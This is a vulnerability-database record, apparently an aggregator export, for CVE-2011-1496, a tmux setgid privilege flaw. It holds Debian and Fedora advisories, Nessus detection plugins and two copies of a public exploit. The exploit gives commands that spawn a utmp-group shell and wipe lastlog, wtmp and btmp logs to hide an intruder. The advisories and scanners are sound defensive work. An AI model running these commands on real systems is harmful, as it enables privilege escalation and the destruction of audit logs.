-------------------------------------------------------------------------\r\n\r\nPackage : tmux\r\nVulnerability : privilege escalation\r\nProblem type : local\r\nDebian-specific: yes\r\nCVE ID : CVE-2011-1496\r\nDebian bug : 620304\r\n\r\nDaniel Danner discovered that tmux, a terminal multiplexer, is not\r\nproperly dropping group privileges. Due to a patch introduced by Debian,\r\nwhen invoked with the -S option, tmux is not dropping permissions obtained\r\nthrough its setgid installation.\r\n\r\n\r\nThe oldstable distribution (lenny) is not affected by this problem,\r\nit does not include tmux.\r\n\r\nFor the stable distribution (squeeze), this problem has been fixed in\r\nversion 1.3-2+squeeze1.\r\n\r\nFor the testing distribution (wheezy), this problem has been fixed in\r\nversion 1.4-6.\r\n\r\nFor the testing distribution (sid), this problem has been fixed in\r\nversion 1.4-6.\r\n\r\n\r\nWe recommend that you upgrade your tmux packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAk2eFbcACgkQHYflSXNkfP/NsgCfcy8X81nTclGCQSWTXxX1/wDF\r\no3kAnR7KmINuzH+MnbAls9Vf8Ewib/Bc\r\n=jUL0\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2011-04-11T00:00:00", "published": "2011-04-11T00:00:00", "id": "SECURITYVULNS:DOC:26091", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26091", "title": "[SECURITY] [DSA 2212-1] tmux security update", "type": "securityvulns", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2019-05-30T02:21:51", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1496"], "description": "Daniel Danner discovered that tmux, a terminal multiplexer, is not\nproperly dropping group privileges. Due to a patch introduced by\nDebian, when invoked with the -S option, tmux is not dropping\npermissions obtained through its setgid installation (CVE-2011-1496).\n\nFor the lenny-backports distribution this problem has been fixed in\nversion 1.3-2+squeeze1~bpo50+1.\n\nFor the squeeze-backports distribution this problem has been fixed in\nversion 1.4-6~bpo60+1.\n\nFor the stable distribution (squeeze), this problem has been fixed\nin version 1.3-2+squeeze1.\n\nFor the testing distribution (wheezy), this problem has been fixed\nin version 1.4-6.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4-6.\n\nUpgrade instructions\n--------------------\n\nIf you don't use pinning (see [1]) you have to update the package\nmanually via "apt-get -t lenny-backports install <packagelist>" with\nthe packagelist of your installed packages affected by this update.\n[1] <http://backports.debian.org/Instructions>\n\nWe recommend to pin (in /etc/apt/preferences) the backports repository\nto 200 so that new versions of installed backports will be installed\nautomatically.\n\n Package: *\n Pin: release a=lenny-backports\n Pin-Priority: 200\n\n-- \nRomain Francoise <rfrancoise@debian.org>\nhttp://people.debian.org/~rfrancoise/\n", "edition": 2, "modified": "2011-04-12T10:16:52", "published": "2011-04-12T10:16:52", "id": "DEBIAN:BSA-032:151E2", "href": "https://lists.debian.org/debian-backports-announce/2011/debian-backports-announce-201104/msg00001.html", "title": "[BSA-032] Security update for tmux", "type": "debian", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-12T00:57:08", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1496"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2212-1 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nApril 7, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : tmux\nVulnerability : privilege escalation\nProblem type : local\nDebian-specific: yes\nCVE ID : CVE-2011-1496\nDebian bug : 620304\n\nDaniel Danner discovered that tmux, a terminal multiplexer, is not\nproperly dropping group privileges. Due to a patch introduced by Debian,\nwhen invoked with the -S option, tmux is not dropping permissions obtained\nthrough its setgid installation.\n\n\nThe oldstable distribution (lenny) is not affected by this problem,\nit does not include tmux.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.3-2+squeeze1.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 1.4-6.\n\nFor the testing distribution (sid), this problem has been fixed in\nversion 1.4-6.\n\n\nWe recommend that you upgrade your tmux packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n\n", "edition": 8, "modified": "2011-04-07T20:06:08", "published": "2011-04-07T20:06:08", "id": "DEBIAN:DSA-2212-1:E2DA3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00081.html", "title": "[SECURITY] [DSA 2212-1] tmux security update", "type": "debian", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T16:10:27", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "tmux '-S' Option Incorrect SetGID Privilege Escalation Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1496"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-71596", "id": "SSV:71596", "sourceData": "\n ---------------------------------------\r\n| Team ph0x90bic proudly presents |\r\n| tmux -S 1.3/1.4 local utmp exploit |\r\n---------------------------------------\r\n\r\n# Exploit Title: tmux '-S' Option Incorrect SetGID Local Privilege Escalation Vulnerability\r\n# Date: 11.04.2011\r\n# Author: ph0x90bic\r\n# Software Link: http://tmux.sourceforge.net/\r\n# Version: 1.3/1.4\r\n# Tested on: Linux debian 2.6.26-1-686\r\n# CVE : CVE-2011-1496\r\n\r\n---\r\n\r\nINTRODUCTION\r\n\r\ntmux 1.3/1.4 contains a privilege escalation vulnerabillity,\r\nwhich gives you utmp group privileges. This bug is important,\r\nbecause it is possible to clean logfiles and use logcleaners\r\nfor btmp, wtmp and lastlog without local root access.\r\n\r\n---\r\n\r\nEXPLOIT\r\n\r\nExecute shell as utmp group\r\n\r\n$ tmux -S /tmp/.whateveryouwant -c id\r\nuid=1001(company) gid=1001(company) egid=43(utmp), groups=1001(company)\r\n\r\n$ tmux -S /tmp/.whateveryouwant -c /bin/sh\r\n$ id\r\nuid=1001(company) gid=1001(company) egid=43(utmp), groups=1001(company)\r\n\r\n--\r\n\r\nDelete logfiles\r\n\r\n$ tmux -S /tmp/.whateveryouwant -c '> /var/log/lastlog'\r\n$ tmux -S /tmp/.whateveryouwant -c '> /var/log/wtmp'\r\n$ tmux -S /tmp/.whateveryouwant -c '> /var/log/btmp'\r\n\r\n--\r\n\r\nUse logcleaner software\r\n\r\n$ tmux -S /tmp/.whateveryouwant -c /tmp/thcclear13/cleara hacker-username\r\n\n ", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71596"}], "exploitpack": [{"lastseen": "2020-04-01T19:06:08", "description": "\ntmux 1.31.4 - -S Option Incorrect SetGID Privilege Escalation", "edition": 1, "published": "2011-04-11T00:00:00", "title": "tmux 1.31.4 - -S Option Incorrect SetGID Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1496"], "modified": "2011-04-11T00:00:00", "id": "EXPLOITPACK:AE6F662161F64680EFBFC345AFDB128E", "href": "", "sourceData": "---------------------------------------\n| Team ph0x90bic proudly presents |\n| tmux -S 1.3/1.4 local utmp exploit |\n---------------------------------------\n\n# Exploit Title: tmux '-S' Option Incorrect SetGID Local Privilege Escalation Vulnerability\n# Date: 11.04.2011\n# Author: ph0x90bic\n# Software Link: http://tmux.sourceforge.net/\n# Version: 1.3/1.4\n# Tested on: Linux debian 2.6.26-1-686\n# CVE : CVE-2011-1496\n\n---\n\nINTRODUCTION\n\ntmux 1.3/1.4 contains a privilege escalation vulnerabillity,\nwhich gives you utmp group privileges. This bug is important,\nbecause it is possible to clean logfiles and use logcleaners\nfor btmp, wtmp and lastlog without local root access.\n\n---\n\nEXPLOIT\n\nExecute shell as utmp group\n\n$ tmux -S /tmp/.whateveryouwant -c id\nuid=1001(company) gid=1001(company) egid=43(utmp), groups=1001(company)\n\n$ tmux -S /tmp/.whateveryouwant -c /bin/sh\n$ id\nuid=1001(company) gid=1001(company) egid=43(utmp), groups=1001(company)\n\n--\n\nDelete logfiles\n\n$ tmux -S /tmp/.whateveryouwant -c '> /var/log/lastlog'\n$ tmux -S /tmp/.whateveryouwant -c '> /var/log/wtmp'\n$ tmux -S /tmp/.whateveryouwant -c '> /var/log/btmp'\n\n--\n\nUse logcleaner software\n\n$ tmux -S /tmp/.whateveryouwant -c /tmp/thcclear13/cleara hacker-username", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-06T09:46:26", "description": "Daniel Danner discovered that tmux, a terminal multiplexer, is not\nproperly dropping group privileges. Due to a patch introduced by\nDebian, when invoked with the -S option, tmux is not dropping\npermissions obtained through its setgid installation.\n\nThe oldstable distribution (lenny) is not affected by this problem, as\nit does not include tmux.", "edition": 16, "published": "2011-04-08T00:00:00", "title": "Debian DSA-2212-1 : tmux - privilege escalation", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1496"], "modified": "2011-04-08T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:tmux"], "id": "DEBIAN_DSA-2212.NASL", "href": "https://www.tenable.com/plugins/nessus/53324", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2212. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53324);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2011-1496\");\n script_xref(name:\"DSA\", value:\"2212\");\n\n script_name(english:\"Debian DSA-2212-1 : tmux - privilege escalation\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Daniel Danner discovered that tmux, a terminal multiplexer, is not\nproperly dropping group privileges. Due to a patch introduced by\nDebian, when invoked with the -S option, tmux is not dropping\npermissions obtained through its setgid installation.\n\nThe oldstable distribution (lenny) is not affected by this problem, as\nit does not include tmux.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=620304\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/tmux\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2212\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the tmux packages.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.3-2+squeeze1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tmux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"tmux\", reference:\"1.3-2+squeeze1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:09:32", "description": "tmux didn't drop group privileges correctly in all cases.\n\nThis is fixed by using an updated patch originating from the debian\ntmux package.\n\nFixes RHBZ 694563, 656704, 697134, CVE-2011-1496\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2011-04-20T00:00:00", "title": "Fedora 15 : tmux-1.4-4.fc15 (2011-5486)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1496"], "modified": "2011-04-20T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:tmux", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2011-5486.NASL", "href": "https://www.tenable.com/plugins/nessus/53499", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-5486.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53499);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-1496\");\n script_bugtraq_id(47283);\n script_xref(name:\"FEDORA\", value:\"2011-5486\");\n\n script_name(english:\"Fedora 15 : tmux-1.4-4.fc15 (2011-5486)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"tmux didn't drop group privileges correctly in all cases.\n\nThis is fixed by using an updated patch originating from the debian\ntmux package.\n\nFixes RHBZ 694563, 656704, 697134, CVE-2011-1496\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=693824\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-April/058548.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a4e41fd6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected tmux package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tmux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"tmux-1.4-4.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tmux\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:09:31", "description": "tmux didn't drop group privileges correctly in all cases.\n\nThis is fixed by using an updated patch originating from the debian\ntmux package.\n\nFixes RHBZ #694563, CVE-2011-1496\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2011-04-19T00:00:00", "title": "Fedora 13 : tmux-1.4-3.fc13 (2011-5156)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1496"], "modified": "2011-04-19T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:13", "p-cpe:/a:fedoraproject:fedora:tmux"], "id": "FEDORA_2011-5156.NASL", "href": "https://www.tenable.com/plugins/nessus/53480", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-5156.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53480);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-1496\");\n script_bugtraq_id(47283);\n script_xref(name:\"FEDORA\", value:\"2011-5156\");\n\n script_name(english:\"Fedora 13 : tmux-1.4-3.fc13 (2011-5156)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"tmux didn't drop group privileges correctly in all cases.\n\nThis is fixed by using an updated patch originating from the debian\ntmux package.\n\nFixes RHBZ #694563, CVE-2011-1496\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=694563\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-April/058452.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?78c6a287\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected tmux package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tmux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:13\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^13([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 13.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC13\", reference:\"tmux-1.4-3.fc13\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tmux\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:09:31", "description": "tmux didn't drop group privileges correctly in all cases.\n\nThis is fixed by using an updated patch originating from the debian\ntmux package.\n\nFixes RHBZ #694563, CVE-2011-1496\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2011-04-18T00:00:00", "title": "Fedora 14 : tmux-1.4-3.fc14 (2011-5167)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1496"], "modified": "2011-04-18T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:14", "p-cpe:/a:fedoraproject:fedora:tmux"], "id": "FEDORA_2011-5167.NASL", "href": "https://www.tenable.com/plugins/nessus/53463", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-5167.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53463);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-1496\");\n script_bugtraq_id(47283);\n script_xref(name:\"FEDORA\", value:\"2011-5167\");\n\n script_name(english:\"Fedora 14 : tmux-1.4-3.fc14 (2011-5167)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"tmux didn't drop group privileges correctly in all cases.\n\nThis is fixed by using an updated patch originating from the debian\ntmux package.\n\nFixes RHBZ #694563, CVE-2011-1496\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=694563\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-April/058367.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1bb2ffd3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected tmux package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tmux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"tmux-1.4-3.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tmux\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1496"], "description": "tmux is a \"terminal multiplexer.\" It enables a number of terminals (or windows) to be accessed and controlled from a single terminal. tmux is intended to be a simple, modern, BSD-licensed alternative to programs such as GNU Screen. ", "modified": "2011-04-18T21:20:46", "published": "2011-04-18T21:20:46", "id": "FEDORA:5289A1103AF", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: tmux-1.4-3.fc13", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1496"], "description": "tmux is a \"terminal multiplexer.\" It enables a number of terminals (or windows) to be accessed and controlled from a single terminal. tmux is intended to be a simple, modern, BSD-licensed alternative to programs such as GNU Screen. ", "modified": "2011-04-17T21:24:05", "published": "2011-04-17T21:24:05", "id": "FEDORA:3C14C11073F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 14 Update: tmux-1.4-3.fc14", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1496"], "description": "tmux is a \"terminal multiplexer.\" It enables a number of terminals (or windows) 